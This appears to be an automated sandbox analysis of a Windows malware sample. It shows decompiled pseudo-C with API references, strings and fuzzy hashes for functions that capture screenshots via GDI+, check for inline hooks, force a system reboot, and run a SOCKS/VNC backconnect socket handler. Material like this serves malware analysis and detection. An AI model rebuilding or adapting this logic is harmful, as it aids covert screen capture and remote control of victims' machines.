				 *((intOrPtr*)(_t287 + 0x64)) = 1;
				 *((intOrPtr*)(_t287 + 0x68)) = 0;
				 *((intOrPtr*)(_t287 + 0x6c)) = 0;
				 *(_t287 + 0x70) = 0;
				_t269 = LoadLibraryA("gdiplus.dll");
				 *((intOrPtr*)(_t287 + 0x30)) = GetProcAddress(_t269, "GdiplusStartup");
				 *(_t287 + 0x54) = GetProcAddress(_t269, "GdiplusShutdown");
				 *((intOrPtr*)(_t287 + 0x58)) = GetProcAddress(_t269, "GdipCreateBitmapFromHBITMAP");
				 *((intOrPtr*)(_t287 + 0x4c)) = GetProcAddress(_t269, "GdipDisposeImage");
				 *((intOrPtr*)(_t287 + 0x50)) = GetProcAddress(_t269, "GdipGetImageEncodersSize");
				 *((intOrPtr*)(_t287 + 0x64)) = GetProcAddress(_t269, "GdipGetImageEncoders");
				_t160 = GetProcAddress(_t269, "GdipSaveImageToStream");
				 *(_t287 + 0x70) = _t160;
				if( *((intOrPtr*)(_t287 + 0x28)) == 0 ||  *((intOrPtr*)(_t287 + 0x4c)) == 0 ||  *((intOrPtr*)(_t287 + 0x50)) == 0 ||  *((intOrPtr*)(_t287 + 0x44)) == 0 ||  *((intOrPtr*)(_t287 + 0x48)) == 0 ||  *(_t287 + 0x5c) == 0 || _t160 == 0) {
					L70:
					if(_t269 != 0) {
						FreeLibrary(_t269);
					}
					_t161 =  *(_t287 + 0x54);
					if(_t161 != 0) {
						FreeLibrary(_t161);
					}
					if(_t230 != 0) {
						FreeLibrary(_t230);
					}
					return  *((intOrPtr*)(_t287 + 0x20));
				} else {
					_t166 = LoadLibraryA("ole32.dll");
					 *(_t287 + 0x5c) = _t166;
					_t167 = GetProcAddress(_t166, "CreateStreamOnHGlobal");
					 *(_t287 + 0x7c) = _t167;
					if(_t167 == 0) {
						goto L70;
					}
					_t230 = LoadLibraryA("gdi32.dll");
					_t279 = GetProcAddress(_t230, "CreateDCW");
					 *((intOrPtr*)(_t287 + 0x20)) = GetProcAddress(_t230, "CreateCompatibleDC");
					 *(_t287 + 0x2c) = GetProcAddress(_t230, "CreateCompatibleBitmap");
					 *((intOrPtr*)(_t287 + 0x24)) = GetProcAddress(_t230, "GetDeviceCaps");
					 *((intOrPtr*)(_t287 + 0x40)) = GetProcAddress(_t230, "SelectObject");
					 *((intOrPtr*)(_t287 + 0x1c)) = GetProcAddress(_t230, "BitBlt");
					 *((intOrPtr*)(_t287 + 0x44)) = GetProcAddress(_t230, "DeleteObject");
					_t272 = GetProcAddress(_t230, "DeleteDC");
					 *((intOrPtr*)(_t287 + 0x40)) = _t272;
					if(_t279 == 0 ||  *(_t287 + 0x18) == 0 ||  *((intOrPtr*)(_t287 + 0x24)) == 0 ||  *((intOrPtr*)(_t287 + 0x1c)) == 0 ||  *((intOrPtr*)(_t287 + 0x38)) == 0 ||  *((intOrPtr*)(_t287 + 0x14)) == 0 ||  *((intOrPtr*)(_t287 + 0x3c)) == 0 || _t272 == 0) {
						goto L70;
					} else {
						 *((intOrPtr*)(_t287 + 0x6c)) = 1;
						 *(_t287 + 0x70) = 0;
						 *((intOrPtr*)(_t287 + 0x74)) = 0;
						 *((intOrPtr*)(_t287 + 0x78)) = 0;
						 *((intOrPtr*)(_t287 + 0x34))(_t287 + 0x80, _t287 + 0x64, 0);
						if(0 != 0) {
							goto L70;
						}
						 *_t279(L"DISPLAY", 0, 0, 0);
						_t280 = 0;
						 *((intOrPtr*)(_t287 + 0x28)) = 0;
						if(0 == 0) {
							L69:
							 *((intOrPtr*)(_t287 + 0x50))( *((intOrPtr*)(_t287 + 0x78)));
							goto L70;
						}
						 *((intOrPtr*)(_t287 + 0x1c))(0);
						 *((intOrPtr*)(_t287 + 0x34)) = 0;
						if(0 == 0) {
							 *_t272(_t280);
							goto L69;
						}
						_t184 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						 *(_t287 + 0x18) = _t184;
						if(_t184 == 0 || GetIconInfo(_t184, _t287 + 0xa4) != 0 && GetCursorPos(_t287 + 0x2c) != 0) {
							 *((intOrPtr*)(_t287 + 0xd4)) = 0;
						}
						goto L24;
					}
				}
			}

0x0041e92e
0x0041e93a
0x0041e941
0x0041e945
0x0041e949
0x0041e951
0x0041e955
0x0041e959
0x0041e965
0x0041e975
0x0041e981
0x0041e98d
0x0041e999
0x0041e9a5
0x0041e9b1
0x0041e9b5
0x0041e9b7
0x0041e9bf
0x0041ee81
0x0041ee89
0x0041ee8c
0x0041ee8c
0x0041ee8e
0x0041ee94
0x0041ee97
0x0041ee97
0x0041ee9b
0x0041ee9e
0x0041ee9e
0x0041eeae
0x0041e9ff
0x0041ea04
0x0041ea0c
0x0041ea10
0x0041ea12
0x0041ea18
0x00000000
0x00000000
0x0041ea25
0x0041ea35
0x0041ea3f
0x0041ea4b
0x0041ea57
0x0041ea63
0x0041ea6f
0x0041ea7b
0x0041ea81
0x0041ea83
0x0041ea89
0x00000000
0x0041ead9
0x0041eae9
0x0041eaf1
0x0041eaf5
0x0041eaf9
0x0041eafd
0x0041eb03
0x00000000
0x00000000
0x0041eb11
0x0041eb13
0x0041eb15
0x0041eb1b
0x0041ee78
0x0041ee7d
0x00000000
0x0041ee7d
0x0041eb22
0x0041eb26
0x0041eb2c
0x0041ee76
0x00000000
0x0041ee76
0x0041eb44
0x0041eb4c
0x0041eb52
0x0041eb7e
0x0041eb7e
0x0041eb7a
0x0041eb7a
0x0041ea89

APIs

VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
LoadLibraryA.KERNEL32 ref: 0041E95D
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041EA73
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041EA7F
LoadImageW.USER32 ref: 0041EB44
GetIconInfo.USER32(00000000,?), ref: 0041EB5D
GetCursorPos.USER32(?), ref: 0041EB6C
DrawIcon.USER32 ref: 0041EC56
lstrcmpiW.KERNEL32(?,00000000), ref: 0041ECF0
FreeLibrary.KERNEL32(00000000), ref: 0041EE8C
FreeLibrary.KERNEL32(?), ref: 0041EE97
FreeLibrary.KERNEL32(00000000), ref: 0041EE9E

Strings

DeleteObject, xrefs: 0041EA69
GdiplusShutdown, xrefs: 0041E96F
CreateStreamOnHGlobal, xrefs: 0041EA06
GdipCreateBitmapFromHBITMAP, xrefs: 0041E97B
gdiplus.dll, xrefs: 0041E93C
GdipGetImageEncodersSize, xrefs: 0041E993
GdiplusStartup, xrefs: 0041E967
GdipGetImageEncoders, xrefs: 0041E99F
DISPLAY, xrefs: 0041EB0C
CreateCompatibleBitmap, xrefs: 0041EA39
GdipSaveImageToStream, xrefs: 0041E9AB
CreateDCW, xrefs: 0041EA27
SelectObject, xrefs: 0041EA51
CreateCompatibleDC, xrefs: 0041EA2F
BitBlt, xrefs: 0041EA5D
GdipDisposeImage, xrefs: 0041E987
gdi32.dll, xrefs: 0041EA1E
ole32.dll, xrefs: 0041E9FF
DeleteDC, xrefs: 0041EA75
GetDeviceCaps, xrefs: 0041EA45

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfoProtectVirtuallstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1175787026-1167942225
Opcode ID: 48a644a70f77b69276f66e33cb866b904dff545216c0b225d61956a8e854552d
Instruction ID: 81d33746789f1644a98cb2cd7f72d117c53285fc7d8e87af8e34fa5fc1218cda
Opcode Fuzzy Hash: 48a644a70f77b69276f66e33cb866b904dff545216c0b225d61956a8e854552d
Instruction Fuzzy Hash: D5E16E75A48305AFD720DF66C844B9FBBE8BF88B40F04492EF989D2250D778D944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041D940, Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 292
synchronizationsleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041D940(void* __eflags, intOrPtr _a4, char _a8) {
				char _v676;
				char _v804;
				char _v812;
				char _v816;
				char _v820;
				char _v924;
				signed int _v928;
				char _v1028;
				void* _v1036;
				short _v1040;
				void* _v1044;
				short _v1048;
				char _v1052;
				void* _v1056;
				void* _v1060;
				void _v1061;
				void _v1064;
				void* _v1068;
				void _v1069;
				void* _v1072;
				void* _v1076;
				void* _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t65;
				void* _t68;
				void* _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t85;
				void* _t87;
				void* _t90;
				int _t96;
				void* _t104;
				void* _t130;
				void* _t131;
				signed int _t135;
				void* _t175;
				void* _t176;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t184;
				void* _t186;

				_t135 = 0;
				if(E00418040(0,  *0x42e954,  &_v1044) == 0) {
					_t179 = _v1060;
				} else {
					_t176 = _v1044;
					_v1056 = _v1040;
					_t130 = E0041D500( &_v1056, _t176);
					_t179 = _t130;
					_v1064 = _t179;
					if(_t179 == 0) {
						_v1056 = _t130;
					}
					if(_t176 != 0) {
						VirtualFree(_t176, 0, 0x8000);
					}
					_t131 = _v1036;
					if(_t131 != 0) {
						CloseHandle(_t131);
					}
				}
				_t65 = _v1056;
				if(_t65 != 0x1e6) {
					__eflags = _t65 - 0xc;
					if(__eflags != 0) {
						goto L45;
					}
					_t68 = E0041CDD0(__eflags, 0x8889347b, 2);
					_v1056 = _t68;
					__eflags = _t68;
					if(_t68 == 0) {
						L43:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E00412E20( *0x42e954);
						}
						goto L45;
					}
					E0041D150( &_v804);
					E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
					_t75 = OpenMutexW(0x100000, 0,  &_v1040);
					_t181 = GetFileAttributesExW;
					__eflags = _t75;
					if(_t75 == 0) {
						L27:
						_t76 =  *0x42e8fc;
						__imp__IsWellKnownSid( *_t76, 0x16);
						__eflags = _t76 - 1;
						if(__eflags != 0) {
							_v1069 = 0;
							_t77 = ReadProcessMemory(0xffffffff, _t181,  &_v1069, 1, 0);
							__eflags = _t77;
							if(_t77 == 0) {
								L33:
								_t135 = L0040F240(E00419880( *_v1068, L0040F240,  *((intOrPtr*)(_v1068 + 4))), _t135,  &_v816,  *_v1068, L0040F240);
								L34:
								__eflags = _t135 - 1;
								if(_t135 == 1) {
									_t85 = E00412BF0(0,  &_v812, 0x42e958, 0,  &_v1052);
									__eflags = _t85;
									_t135 = _t135 & 0xffffff00 | _t85 != 0x00000000;
									__eflags = _t135;
									if(_t135 != 0) {
										E0041CD80(0x1a43533f,  &_v1036, 1);
										_t87 = CreateEventW(0x42e930, 1, 0,  &_v1048);
										_t184 = _v1064;
										_v1076 = _t87;
										_v1072 = _t184;
										_push(0xffffffff);
										__eflags = _t87;
										if(_t87 != 0) {
											WaitForMultipleObjects(2,  &_v1064, 0, ??);
										} else {
											WaitForSingleObject(_t184, ??);
										}
										_t90 = _v1064;
										__eflags = _t90;
										if(_t90 != 0) {
											CloseHandle(_t90);
										}
										CloseHandle(_v1048);
										CloseHandle(_t184);
									}
								}
								L42:
								_t183 = _v1056;
								ReleaseMutex(_t183);
								CloseHandle(_t183);
								_t179 = _v1068;
								goto L43;
							}
							__eflags = _v1069 - 0xe9;
							if(_v1069 != 0xe9) {
								goto L33;
							}
							_t96 = GetFileAttributesExW(0x42ed66, 0x78f16360,  &_v1064);
							__eflags = _t96 - 1;
							if(_t96 != 1) {
								goto L33;
							}
							E00419880( *((intOrPtr*)(_v1072 + 8)), L0040F8A0,  *((intOrPtr*)(_v1072 + 4)));
							_push(_a4);
							_push( &_v820);
							_t135 = L0040F8A0( &_v820, _t135, _v1072, 0x42e958, L0040F8A0);
							VirtualFree(_v1080, 0, 0x8000);
							goto L34;
						}
						_t135 = E0040FEA0(__eflags);
						goto L42;
					}
					CloseHandle(_t75);
					_t135 = Sleep;
					while(1) {
						_v1061 = 0;
						_t104 = ReadProcessMemory(0xffffffff, _t181,  &_v1061, 1, 0);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L26;
						}
						__eflags = _v1061 - 0xe9;
						if(_v1061 == 0xe9) {
							goto L27;
						}
						L26:
						Sleep(0x1f4);
					}
				} else {
					if(E0040F730(_t179) != 0) {
						E0041D150( &_v804);
						_t166 =  &_v676;
						E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
						_t175 = CreateMutexW(0x42e930, 1,  &_v1040);
						if(_t175 != 0) {
							if(GetLastError() != 0xb7) {
								E0041A440(_t179,  &_v924);
								__eflags = _v928 & 0x00000020;
								if((_v928 & 0x00000020) != 0) {
									 *0x42e8f8 =  *0x42e8f8 | 0x00000010;
									__eflags =  *0x42e8f8;
								}
								E00428230(_t166);
								__eflags =  *0x42e8f8 & 0x00000010;
								if(( *0x42e8f8 & 0x00000010) != 0) {
									ExitWindowsEx(0x14, 0x80000000);
								}
								E0041D150( &_v804);
								E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
								_t186 = OpenEventW(2, 0,  &_v1040);
								__eflags = _t186;
								if(_t186 != 0) {
									SetEvent(_t186);
									CloseHandle(_t186);
								}
								E0041D610(1);
								_t135 = 1;
								CloseHandle(_t175);
								_t179 = _v1064;
							} else {
								CloseHandle(_t175);
							}
						}
					}
					L45:
					if(_t179 != 0) {
						HeapFree( *0x42e6d4, 0, _t179);
					}
					return _t135;
				}
			}

0x0041d95b
0x0041d964
0x0041d9ad
0x0041d966
0x0041d96a
0x0041d96e
0x0041d977
0x0041d97c
0x0041d97e
0x0041d984
0x0041d986
0x0041d986
0x0041d98c
0x0041d996
0x0041d996
0x0041d99c
0x0041d9a2
0x0041d9a5
0x0041d9a5
0x0041d9a2
0x0041d9b1
0x0041d9ba
0x0041dadb
0x0041dade
0x00000000
0x00000000
0x0041daeb
0x0041daf0
0x0041daf4
0x0041daf6
0x0041dcf8
0x0041dcf8
0x0041dcfc
0x0041dd04
0x0041dd04
0x00000000
0x0041dcfc
0x0041db03
0x0041db26
0x0041db37
0x0041db3d
0x0041db49
0x0041db4b
0x0041db87
0x0041db87
0x0041db91
0x0041db97
0x0041db9a
0x0041dbb4
0x0041dbb9
0x0041dbbb
0x0041dbbd
0x0041dc21
0x0041dc46
0x0041dc48
0x0041dc48
0x0041dc4b
0x0041dc66
0x0041dc6b
0x0041dc6d
0x0041dc70
0x0041dc72
0x0041dc80
0x0041dc93
0x0041dc99
0x0041dc9d
0x0041dca1
0x0041dca5
0x0041dca7
0x0041dca9
0x0041dcbd
0x0041dcab
0x0041dcac
0x0041dcac
0x0041dcc3
0x0041dcc7
0x0041dcc9
0x0041dccc
0x0041dccc
0x0041dcdd
0x0041dce0
0x0041dce0
0x0041dc72
0x0041dce2
0x0041dce2
0x0041dce7
0x0041dcee
0x0041dcf4
0x00000000
0x0041dcf4
0x0041dbbf
0x0041dbc4
0x00000000
0x00000000
0x0041dbd5
0x0041dbd7
0x0041dbda
0x00000000
0x00000000
0x0041dbec
0x0041dbf8
0x0041dc00
0x0041dc17
0x0041dc19
0x00000000
0x0041dc19
0x0041dba1
0x00000000
0x0041dba1
0x0041db4e
0x0041db54
0x0041db60
0x0041db6c
0x0041db71
0x0041db73
0x0041db75
0x00000000
0x00000000
0x0041db77
0x0041db7c
0x00000000
0x00000000
0x0041db7e
0x0041db83
0x0041db83
0x0041d9c0
0x0041d9c9
0x0041d9d6
0x0041d9e9
0x0041d9fa
0x0041da11
0x0041da15
0x0041da26
0x0041da3c
0x0041da41
0x0041da4e
0x0041da50
0x0041da50
0x0041da50
0x0041da56
0x0041da5b
0x0041da61
0x0041da6a
0x0041da6a
0x0041da77
0x0041da9a
0x0041daae
0x0041dab0
0x0041dab2
0x0041dab5
0x0041dabc
0x0041dabc
0x0041dac4
0x0041daca
0x0041dacc
0x0041dad2
0x0041da28
0x0041da29
0x0041da29
0x0041da26
0x0041da15
0x0041dd09
0x0041dd0b
0x0041dd17
0x0041dd17
0x0041dd25
0x0041dd25

APIs

Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000), ref: 0041D996
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0041D9A5
CreateMutexW.KERNEL32(0042E930,00000001,?,?,?,00000001,?,?,00000000), ref: 0041DA0B
GetLastError.KERNEL32(?,?,00000000), ref: 0041DA1B
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041DA29
HeapFree.KERNEL32(?,00000000,?,?,?,00000000), ref: 0041DD17

Part of subcall function 0041D500: HeapAlloc.KERNEL32(?,00000000,00000001,00000000,?,004017B0,0000031C,?,?), ref: 0041D565

ExitWindowsEx.USER32(00000014,80000000), ref: 0041DA6A
OpenEventW.KERNEL32(00000002,00000000,?,?,?,00000001), ref: 0041DAA8
SetEvent.KERNEL32(00000000), ref: 0041DAB5
CloseHandle.KERNEL32(00000000), ref: 0041DABC
CloseHandle.KERNEL32(00000000,00000001), ref: 0041DACC

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

OpenMutexW.KERNEL32(00100000,00000000,?,?,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041DB37
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041DB4E
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 0041DB71
Sleep.KERNEL32(000001F4), ref: 0041DB83
IsWellKnownSid.ADVAPI32(?,00000016,?,?,00000000), ref: 0041DB91
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,00000016,?,?,00000000), ref: 0041DBB9
GetFileAttributesExW.KERNEL32(0042ED66,78F16360,?,?,00000016,?,?,00000000), ref: 0041DBD5
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,?,?,00000016,?,?,00000000), ref: 0041DC19
CreateEventW.KERNEL32(0042E930,00000001,00000000,1A43533F,1A43533F,?,00000001,0042E958,00000000,?,?,?,00000016,?,?,00000000), ref: 0041DC93
WaitForSingleObject.KERNEL32(?,000000FF,?,00000016,?,?,00000000), ref: 0041DCAC
WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,?,00000016,?,?,00000000), ref: 0041DCBD
CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCCC
CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCDD
CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCE0

Part of subcall function 00419880: VirtualProtect.KERNEL32(0040F240,74B05B60,00000040,00000000,?,?,0041DC35,?,?,00000016,?,?,00000000), ref: 00419891
Part of subcall function 00419880: VirtualProtect.KERNEL32(0040F240,74B05B60,00000000,00000000,?,?,0041DC35,?,?,00000016,?,?,00000000), ref: 004198C3

ReleaseMutex.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0041DCE7
CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCEE

Strings

pB, xrefs: 0041D9F5
pB, xrefs: 0041DB21
XB, xrefs: 0041DC3C
pB, xrefs: 0041DA95
XB, xrefs: 0041DC01
, xrefs: 0041DA41

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateMutexVirtual$EventFileFreeWait$HeapMemoryObjectOpenProcessProtectReadSingle$AllocAttributesErrorExitFromKnownLastMultipleObjectsReleaseSizeSleepStringWellWindows
String ID: $XB$XB$pB$pB$pB
API String ID: 2138556076-1967776627
Opcode ID: ee2aed6d127b2ef496f1571f899c62c979c904e062df8946192978a90ff31bf0
Instruction ID: c7e48b5e94a7232cc440fca26077774841184021d03dda8520883d5d35a86dc6
Opcode Fuzzy Hash: ee2aed6d127b2ef496f1571f899c62c979c904e062df8946192978a90ff31bf0
Instruction Fuzzy Hash: D3A1E7B1A04301ABD320EB61DD45FEB77A4AFC5700F44492EF945A7290D778EC85CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A850, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 292
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041A850(void _a4) {
				char _v544;
				char _v548;
				char _v808;
				int _v812;
				char _v824;
				intOrPtr _v832;
				void* _v1016;
				void* _v1020;
				long _v1044;
				int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				int _v1060;
				char _v1068;
				intOrPtr _v1088;
				signed int _v1092;
				char _v1096;
				signed int _v1100;
				short _v1102;
				void* _v1104;
				char _v1108;
				intOrPtr _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* __edi;
				void* __esi;
				signed short _t72;
				signed char _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				signed int _t89;
				intOrPtr _t96;
				void* _t97;
				signed int _t102;
				signed int _t103;
				void* _t110;
				signed char _t114;
				signed int _t118;
				void* _t120;
				intOrPtr _t132;
				signed int _t146;
				void* _t150;
				intOrPtr _t153;
				void* _t156;
				void* _t159;
				signed int _t161;
				void* _t162;
				signed int _t163;
				void* _t165;

				_t165 = (_t163 & 0xfffffff8) - 0x41c;
				E00410870( &_v1020,  &_v1020, 0, 0x104);
				_t156 = _a4;
				if(lstrcmpiA( *_t156, "socks") != 0) {
					if(lstrcmpiA( *_t156, "vnc") != 0) {
						_t72 = E004110A0( *_t156, 0);
						_t5 = _t72 - 1; // -1
						if(_t5 > 0xfffd) {
							goto L45;
						}
						_t89 = _t72 & 0x0000ffff;
						_v1044 = _t89;
						if(_t89 == 0) {
							goto L45;
						}
						goto L6;
					}
					_v1044 = 0xfffffffe;
					goto L6;
				} else {
					_v1044 = 0xffffffff;
					L6:
					_t153 = E00414D70(E004110A0( *(_t156 + 8), 0),  *(_t156 + 4));
					_v1052 = _t153;
					if(_t153 == 0xffffffff) {
						L45:
						_t73 = _v1020;
						if(_t73 != 0) {
							WaitForMultipleObjects(_t73 & 0x000000ff,  &_v1016, 1, 0xffffffff);
							_t73 = _v1020;
						}
						_t114 = 0;
						if(_t73 == 0) {
							L49:
							_t74 =  *_t156;
							if(_t74 != 0) {
								HeapFree( *0x42e6d4, 0, _t74);
							}
							_t75 =  *(_t156 + 4);
							if(_t75 != 0) {
								HeapFree( *0x42e6d4, 0, _t75);
							}
							_t76 =  *(_t156 + 8);
							if(_t76 != 0) {
								HeapFree( *0x42e6d4, 0, _t76);
							}
							_t150 =  *(_t156 + 0xc);
							ReleaseMutex(_t150);
							CloseHandle(_t150);
							HeapFree( *0x42e6d4, 0, _t156);
							return 0;
						} else {
							do {
								CloseHandle( *(_t165 + 0x34 + (_t114 & 0x000000ff) * 4));
								_t114 = _t114 + 1;
							} while (_t114 < _v1020);
							goto L49;
						}
					}
					_v1048 = 1;
					__imp__#21(_t153, 6, 1,  &_v1048, 4);
					_v1060 = 1;
					_v1056 = 0x493e0;
					_v1052 = 0x1388;
					__imp__WSAIoctl(_t153, 0x98000004,  &_v1060, 0xc, 0, 0,  &_v1068, 0, 0);
					E0041D1B0( &_v548);
					_t118 = 0;
					if(_v544 == 0) {
						L43:
						if(_t153 != 0xffffffff) {
							__imp__#22(_t153, 2);
							__imp__#3(_t153);
						}
						goto L45;
					}
					do {
						_t118 = _t118 + 1;
					} while ( *((short*)(_t165 + 0x244 + _t118 * 2)) != 0);
					if(_t118 <= 0) {
						goto L43;
					}
					_t159 = E004109D0( &_v544, 0xfde9, _t118);
					_v1104 = _t159;
					if(_t159 == 0) {
						L42:
						_t156 = _a4;
						goto L43;
					}
					_t96 = 0;
					_v1092 = _t118;
					if( *_t159 == 0) {
						L15:
						_v1088 = _t96;
						_t97 = E00419DA0(_t96, 1, _t153, _t159);
						HeapFree( *0x42e6d4, 0, _t159);
						E00410870( &_v1100,  &_v1100, 0, 0xc);
						if(_t97 == 0) {
							goto L42;
						} else {
							goto L16;
						}
						while(1) {
							L16:
							_v812 = 1;
							E00410820( &_v808,  &_v1108, 4);
							_t102 =  &_v824;
							__imp__#18(0, _t102, 0, 0, 0);
							if(_t102 != 0) {
								goto L30;
							}
							__imp__#112(0x274c);
							L18:
							_t103 = _t102 | 0xffffffff;
							L19:
							_t153 = _v1128;
							if(_t103 != _t153 || E00419B40(_t153,  &_v1104,  &_v1124) == 0) {
								goto L42;
							} else {
								_t120 = _v1124;
								if(_v1100 != 2 || _v1102 != 4) {
									L28:
									if(_t120 != 0) {
										HeapFree( *0x42e6d4, 0, _t120);
									}
									continue;
								} else {
									_t162 = HeapAlloc( *0x42e6d4, 8, 0x10);
									if(_t162 == 0) {
										L27:
										E004163B0( &_v1096);
										goto L28;
									}
									 *_t162 = _a4;
									 *((intOrPtr*)(_t162 + 4)) = _v1120;
									 *(_t162 + 8) =  *_t120;
									if(_v1096 < 0x40) {
										if(E0041A680 == 0) {
											goto L27;
										}
										_t110 = CreateThread(0, 0x20000, E0041A680, _t162, 0, 0);
										if(_t110 == 0) {
											L26:
											HeapFree( *0x42e6d4, 0, _t162);
											goto L27;
										}
										 *(_t165 + 0x34 + (_v1100 & 0x000000ff) * 4) = _t110;
										_v1100 = _v1100 + 1;
										goto L27;
									}
									SetLastError(0x9b);
									goto L26;
								}
							}
							L30:
							if(_t102 == 0xffffffff) {
								goto L18;
							}
							_t132 = _v832;
							_t161 = 0;
							do {
								_t102 = 0;
								if(_t132 == 0) {
									goto L36;
								}
								_t146 =  *(_t165 + 0x10 + _t161 * 4);
								while( *((intOrPtr*)(_t165 + 0x13c + _t102 * 4)) != _t146) {
									_t102 = _t102 + 1;
									if(_t102 < _t132) {
										continue;
									}
									goto L36;
								}
								_t103 = _t146;
								goto L19;
								L36:
								_t161 = _t161 + 1;
							} while (_t161 < 1);
							goto L18;
						}
					}
					do {
						_t96 = _t96 + 1;
					} while ( *((char*)(_t96 + _t159)) != 0);
					goto L15;
				}
			}

0x0041a856
0x0041a86b
0x0041a870
0x0041a885
0x0041a89d
0x0041a8ad
0x0041a8b2
0x0041a8bb
0x00000000
0x00000000
0x0041a8c1
0x0041a8c4
0x0041a8ca
0x00000000
0x00000000
0x00000000
0x0041a8ca
0x0041a89f
0x00000000
0x0041a887
0x0041a887
0x0041a8d0
0x0041a8e2
0x0041a8e4
0x0041a8eb
0x0041ab62
0x0041ab62
0x0041ab68
0x0041ab77
0x0041ab7d
0x0041ab7d
0x0041ab81
0x0041ab85
0x0041ab9d
0x0041ab9d
0x0041aba7
0x0041abb2
0x0041abb2
0x0041abb4
0x0041abb9
0x0041abc5
0x0041abc5
0x0041abc7
0x0041abcc
0x0041abd8
0x0041abd8
0x0041abda
0x0041abde
0x0041abe5
0x0041abf4
0x0041abfe
0x0041ab87
0x0041ab87
0x0041ab8f
0x0041ab95
0x0041ab97
0x00000000
0x0041ab87
0x0041ab85
0x0041a901
0x0041a905
0x0041a925
0x0041a929
0x0041a931
0x0041a939
0x0041a946
0x0041a94b
0x0041a955
0x0041ab4d
0x0041ab50
0x0041ab55
